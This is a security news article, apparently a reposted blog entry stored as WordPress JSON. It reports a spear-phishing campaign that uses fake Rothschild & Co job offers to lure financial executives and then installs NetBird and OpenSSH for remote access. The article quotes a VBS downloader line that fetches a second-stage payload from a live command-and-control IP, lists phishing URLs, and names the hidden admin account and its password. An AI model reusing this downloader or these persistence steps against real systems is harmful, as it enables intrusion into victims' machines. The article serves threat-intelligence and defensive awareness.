{"id":4274,"date":"2025-05-29T10:03:49","date_gmt":"2025-05-29T10:03:49","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/05\/29\/new-spear-phishing-attack-targeting-financial-executives-by-deploying-netbird-malware\/"},"modified":"2025-05-29T10:03:49","modified_gmt":"2025-05-29T10:03:49","slug":"new-spear-phishing-attack-targeting-financial-executives-by-deploying-netbird-malware","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/05\/29\/new-spear-phishing-attack-targeting-financial-executives-by-deploying-netbird-malware\/","title":{"rendered":"New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware"},"content":{"rendered":"<p>    New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A sophisticated spear-phishing campaign has emerged targeting chief financial officers and senior financial executives across banking, energy, insurance, and investment sectors worldwide, marking a concerning escalation in precision-targeted cyber attacks against corporate leadership.<\/p>\n<p>The campaign, which surfaced on May 15, 2025, employs advanced social engineering techniques disguised as legitimate recruitment opportunities from prestigious financial firm Rothschild &amp; Co to compromise high-value targets across Europe, Africa, Canada, the Middle East, and South Asia.<\/p>\n<p>This multi-stage operation through their email security products, which flagged the suspicious campaign due to unusual <a href=\"https:\/\/cybersecuritynews.com\/clickfix-captcha-technique-ransomware\/\">CAPTCHA<\/a> behavior patterns and evasive URL structures.<\/p>\n<p>The attackers demonstrate sophisticated understanding of corporate hierarchies and executive psychology, crafting personalized messages that appeal to career advancement aspirations while bypassing traditional security awareness training focused on generic phishing attempts.<\/p>\n<p>The attack represents a significant departure from conventional malware deployment strategies, as threat actors leverage NetBird, a legitimate WireGuard-based remote access tool, rather than traditional backdoors or trojans.<\/p>\n<p>This approach allows attackers to blend malicious activities with legitimate network management tools, complicating detection efforts and extending persistence capabilities.<\/p>\n<p>Trellix researchers <a href=\"https:\/\/www.trellix.com\/blogs\/research\/cfo-spear-phishing-netbird-attack\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">noted<\/a> that portions of the infrastructure overlap with at least one other nation-state spear-phishing campaign, though definitive attribution remains pending further investigation.<\/p>\n<p>The campaign\u2019s global reach spans multiple industries and geographic regions, with confirmed targeting of financial institutions in the United Kingdom, Canada, South Africa, Norway, South Korea, Singapore, Switzerland, France, Egypt, Saudi Arabia, and Brazil.<\/p>\n<p>The precision targeting suggests extensive <a href=\"https:\/\/cybersecuritynews.com\/morphing-meerkat-phaas-using-dns-reconnaissance\/\" target=\"_blank\" rel=\"noreferrer noopener\">reconnaissance<\/a> capabilities and access to detailed corporate organizational charts, indicating a well-resourced threat actor with strategic objectives beyond immediate financial gain.<\/p>\n<h2 class=\"wp-block-heading\"><strong>Infection Mechanism and Multi-Stage Payload Delivery<\/strong><\/h2>\n<p>The attack chain initiates with carefully crafted emails bearing the subject line \u201cRothschild &amp; Co leadership opportunity (Confidential)\u201d sent from the address _863563754768397286998728@notarius.net.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgBdYxIahB3ujoG36IrMmQXC527FQMj7mYENmcM1Q2BBFkiKWTQoDC-1um8pYy6RE5lDczB7788O1ByjsziOvIdk_ftkm0F0qeOvhJT1lk63HofmcAV0bwtYF5L3i1V5GMcG9UajHKL26Do-CMPsQox_0OUVw-_T6ep-nRXrqS4k-L0CAqW-VKqoQQl-Yk\/s16000\/Spear-Phishing%2520Campaign%2520Installing%2520Netbird%2520and%2520Enabling%2520Remote%2520Access%2520%28Source%2520-%2520Trellix%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Spear-Phishing Campaign Installing Netbird and Enabling Remote Access (Source \u2013 Trellix)<\/figcaption><\/figure>\n<\/div>\n<p>Recipients receive what appears to be a PDF attachment named \u201cRothschild_&amp;_Co-6745763.PDF,\u201d which actually functions as a phishing link redirecting victims to a Firebase-hosted application at hxxps:\/\/googl-6c11f.firebaseapp[.]com\/job\/file-846873865383.html.<\/p>\n<p>The intermediate page implements a custom CAPTCHA mechanism requiring users to solve simple mathematical calculations, specifically asking \u201cWhat is the result of 9 + 10?\u201d This evasion technique circumvents automated <a href=\"https:\/\/cybersecuritynews.com\/web-security-scanners\/\" target=\"_blank\" rel=\"noreferrer noopener\">security scanners<\/a> while creating a false sense of legitimacy through the mathematical verification process.<\/p>\n<p>Upon successful completion, JavaScript functions decrypt a hardcoded redirect URL, leading victims to hxxps:\/\/googl-6c11f.web[.]app\/job\/9867648797586_Scan_15052025-736574.html, where they encounter a download portal mimicking secure document delivery systems.<\/p>\n<p>The downloaded archive \u201cRothschild_&amp;_Co-6745763.zip\u201d contains an initial VBS script that establishes the infection foothold. This 1KB file performs several critical functions upon execution:-<\/p>\n<pre class=\"wp-block-code\"><code>scriptURL = \"http:\/\/192.3.95.152\/cloudshare\/atr\/pull.pdf\"\nsavePath = \"C:temperpull.vbs\"\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\nIf Not objFSO.FolderExists(\"C:temper\") Then\n    objFSO.CreateFolder \"C:temper\"\nEnd If<\/code><\/pre>\n<p>The script establishes a temporary directory structure, downloads a secondary payload disguised as a PDF file, and executes it with elevated privileges using the \u201crunas\u201d flag.<\/p>\n<p>This second-stage VBS downloader retrieves additional components from the same command and control server, including NetBird and OpenSSH MSI packages concealed within a renamed ZIP archive.<\/p>\n<p>The installation process occurs silently through msiexec commands, while the script simultaneously creates a hidden administrative account named \u201cuser\u201d with the password \u201cBs@202122\u201d and enables Remote Desktop Protocol access, providing attackers with multiple persistent access vectors to compromised systems.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 90%,rgb(169,184,195) 100%)\"><strong>Try in-depth sandbox malware analysis for\u00a0<strong>your SOC tea<\/strong>m. Get\u00a0ANY.RUN special offer only\u00a0until May 31<\/strong>\u00a0-&gt;\u00a0<strong><a href=\"https:\/\/app.any.run\/plans?utm_source=li_csn&amp;utm_medium=article&amp;utm_campaign=telegram_bot&amp;utm_content=plans&amp;utm_term=260525\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Try Here<\/a><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/new-spear-phishing-attack-targeting-financial-executives\/\">New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/new-spear-phishing-attack-targeting-financial-executives\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware A sophisticated spear-phishing campaign has emerged targeting chief financial officers and senior financial executives across banking, energy, insurance, and investment sectors worldwide, marking a concerning escalation in precision-targeted cyber attacks against corporate leadership. The campaign, which surfaced on May 15, 2025, employs advanced social engineering [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[63,124,649],"tags":[130],"class_list":["post-4274","post","type-post","status-publish","format-standard","hentry","category-cyber-security-news","category-phishing","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/4274"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=4274"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/4274\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=4274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=4274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=4274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}